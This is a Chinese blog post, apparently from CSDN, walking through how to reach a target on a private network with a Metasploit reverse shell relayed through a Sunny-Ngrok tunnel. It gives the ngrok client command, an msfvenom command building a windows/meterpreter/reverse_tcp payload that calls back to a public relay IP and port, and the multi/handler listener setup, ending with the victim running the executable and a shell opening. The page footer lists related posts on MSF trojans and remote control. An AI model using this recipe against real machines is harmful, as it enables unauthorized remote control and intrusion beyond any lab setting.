MSF配合Ngrock穿透内网

最新推荐文章于 2022-12-23 16:47:17 发布
最新推荐文章于 2022-12-23 16:47:17 发布
阅读量857 收藏 7
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/105777612
版权

当被攻击目标在内网无法与本地直接建立会话时,需要公网地址监听并转发会话。此时解决办法有:

1.msf安装在公网上;
2.使用公网进行转发 。

Ngrok 是一个反向代理,通过在公共的端口和本地运行的 Web 服务器之间建立一个安全的通道。可捕获和分析所有通道上的流量,便于后期分析和重放。它是内网穿透的跳板。

一、搭建ngrock服务器

官网:https://ngrok.cc/

在官网注册账号,这里实验使用免费版。注意:免费版可能无法加载会话,为我这种穷b准备的。
在这里插入图片描述
设置监听端口:
在这里插入图片描述
复制隧道id。选择版本进行客户端下载:
在这里插入图片描述
在这里插入图片描述
下载完成。在kali里直接运行:

./sunny clientid b86088bd6xxxxxx

后面这一串是购买时ngrock附送的隧道id;ngrock客户端与服务器建立连接,不要关闭这个窗口。
在这里插入图片描述

二、msf生成payload:

msfvenom -p windows/meterpreter/reverse_tcp lhost=64.69.43.237 lport=10147 -f

在这里插入图片描述
这里监听的lhost和lport需要设置成购买ngrock时附送的域名和端口,为了防止dns解析出现问题,在生成payload时使用IP而不是使用域名。
在这里插入图片描述
msf 建立监听:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 10147
run

在这里插入图片描述
ps: 建立监听时设置的IP是127.0.0.1,因为ngrock是与127.0.0.1建立的会话

三、靶机运行payload建立会话

将刚刚生成的payload a.exe放到靶机里面并运行,成功建立会话:
在这里插入图片描述
msf里面成功返回会话即可输入shell创建连接:
在这里插入图片描述
实验成功

ps:由于实验是白嫖的免费版ngrock,所有很卡很慢很不稳定还不一定能够成功返回会话。这里靶机运行了十多次才返回会话。所以还是收费版本比较香
在这里插入图片描述

=========================================================
在这里插入图片描述

Min1996
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用PHP有效负载(msf)和ngrok进行黑客攻击 (ABPET)
我不是猫叔
09-11 637
使用PHP有效负载和ngrok 进行黑客攻击 我们将使用PHP有效负载进行黑客攻击,在本教程中我们将使用msfvenom(其实就是MSF)。 Msfvenom包含在kali linux操作系统中 工具准备阶段 步骤1:安装ngrok 请按照说明书安装ngrok。 让我们从下载ngrok开始。在这里下载ngrok。https://ngrok.com/download. 一旦ngrok完成下载,...
通过ngrok在内网捕获meterpreter反弹
hambaga的博客
09-13 1585
一、准备工作 在学习msf的过程中,一般都是搭建虚拟机,在局域网里进行练习的。在实际渗透中,目标机器与我们的主机可能并不在同一个网络内,甚至会有双方都处在内网中的情况。那么,如何让处在内网中的目标机器把 meterpreter shell 反弹到同样在内网中的主机呢? 首先需要一台有公网ip的服务器,用作中转。然后在服务器上部署ngrok服务,并生成linux平台的客户端程序。我选择的是自己搭...
Ngrok内网穿透配合msf木马
sky
06-18 4117
Ngrok内网穿透配合msf木马   1. Ngrok的安装 原文地址:http://www.ggsec.cn/ Ngrok的下载地址:https://ngrok.com/download 下载对应版本并注册帐号 解压后将其放入 /bin/ ngrok  authtoken 6RBm_2CfWq3xAJ3XVK(6RBm_2CfWq3xAJ3XVK是你注册后给你的)   2.tc
metasploit学习--联合Ngrok内网穿透生成木马远控主机
Delity的博客
04-27 1440
一、msf生成木马,联合Sunny-Ngrok进行内网穿透,远程控制外网主机 1.链接隧道 ./sunny clientid 隧道id 2.生成木马 msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=xxx.idcfengye.com LPORT=xxxx -f exe -o shell...
WinRAR远程代码执行漏洞结合Metasploit+Ngrok实现远程上线
欢迎来到神林的博客
03-11 723
前言 Windows 操作系统下知名老牌的的压缩软件“WinRAR” 被国外安全研究团队爆出严重威胁用户的安全漏洞,被发现漏洞是“WinRAR”安装目录中的一个名为“UNACEV2.dll”的动态链接库文件,该文件自 2005 年发布至今就从未有过更新过,影响时长长达十余年之久。本篇文章鄙人会使用图文+视频的教程来给各位不知道利用的小粉们讲一下,视频教程在文末尾处。 漏洞细节: https://r...
内网MSF11111
01-05
内网渗透测试中,Metasploit(MSF)是一个常用的安全工具,用于模拟攻击和漏洞利用。本文将详细讲解如何在内网环境中配置MSF,包括PostgreSQL数据库的安装、管理以及MSF数据库的设置。 首先,安装PostgreSQL数据库...
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf内网渗透
10-29
msf内网渗透
项目管理利刃之MSF
03-03
火龙果软件工程技术中心 MSF,MicrosoftSolutionFramework,微软解决方案框架是一个在预算范围内按期创建一个业务解决方案需要一种经过检验的方法。本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目...
msf windows版
09-22
msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版 msf windows版
内网kali 通过ngrok穿透反弹shell
失心少年
08-05 7730
1、在ngrok注册账号,并且开通免费隧道(网址:https://www.ngrok.cc) 这里我kali的内网ip地址是10.10.10.131 2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html) 解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件 3...
内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok
m0_65336233的博客
12-23 2299
内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok
最全ngrok实现内网穿透详细教程(windows )
qq_40595922的博客
10-21 2857
ngrok实现内网穿透详细教程(windows )
msf安卓手机木马实战要点整理
Vdieoo的博客
04-07 5538
Msf手机木马高级选项设置说明 Androidwakelock 阻止手机休眠以便处理耗时操作 AutoUnhookProcess ? AutoVerifySession 自动验证删除无效会话 AutoVerifySessionTimeout 超时期间等待会话验证发生在几秒钟内 EnableStageEncoding 对第二级有效载荷进行编码 Sessi...
MSF课堂笔记
qq_33040633的博客
10-17 2915
msf
Ngrok内网穿透的几种利用
热门推荐
Matthew
09-22 1万+
其实这篇之前投稿了,不过版权在我这里,地址在这里:http://bobao.360.cn/learning/detail/3041.html       Ngrok是这样介绍:一条命令解决的外网访问内网问题,本地WEB外网访问、本地开发微信、TCP端口转发。有tcp端口转发的功能,就尝试利用ngrok进行内网穿透Ngrok的网址:http://www.ngrok.cc/。【这个不是官网地
MSF+内网穿透 实现远控
yxngu
05-09 9983
网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明白原理,懂得如何防范,再三强调!!! 使用此教程用在不正当地方造成的后果与本人无关!!! 接下来开始本次教程 先给大家展示一下效果吧!基于此程序可以监视对方电脑,实时屏幕抓取,甚至实时屏幕监测,还有创...
ngrock内网穿透Ngrok 和 Sunny-Ngrok )
weixin_43229729的博客
03-23 1万+
由于最近做支付功能,支付宝访问的回调接口必须是外网可以访问的,而目前在开发阶段,没有部署到正式环境(公司的域名为正式环境的)。所以在开发测试时需要用到ngrok,将自己电脑ip暴露在外网上。 什么是内网穿透内网穿透,即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点需要连接通信,有时就会出现不支持内网穿透。简单来说,就是让身处局域网的电脑,被大家都能访问的技术。 Ngro...
msf和frp内网穿透
最新发布
08-19
msf和frp都是常用于内网穿透的工具,可以帮助远程访问和控制内网中的设备。 Metasploit Framework(简称msf)是一个开源的渗透测试框架,它提供了丰富的渗透测试工具和模块。虽然msf主要是用于渗透测试和漏洞利用,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值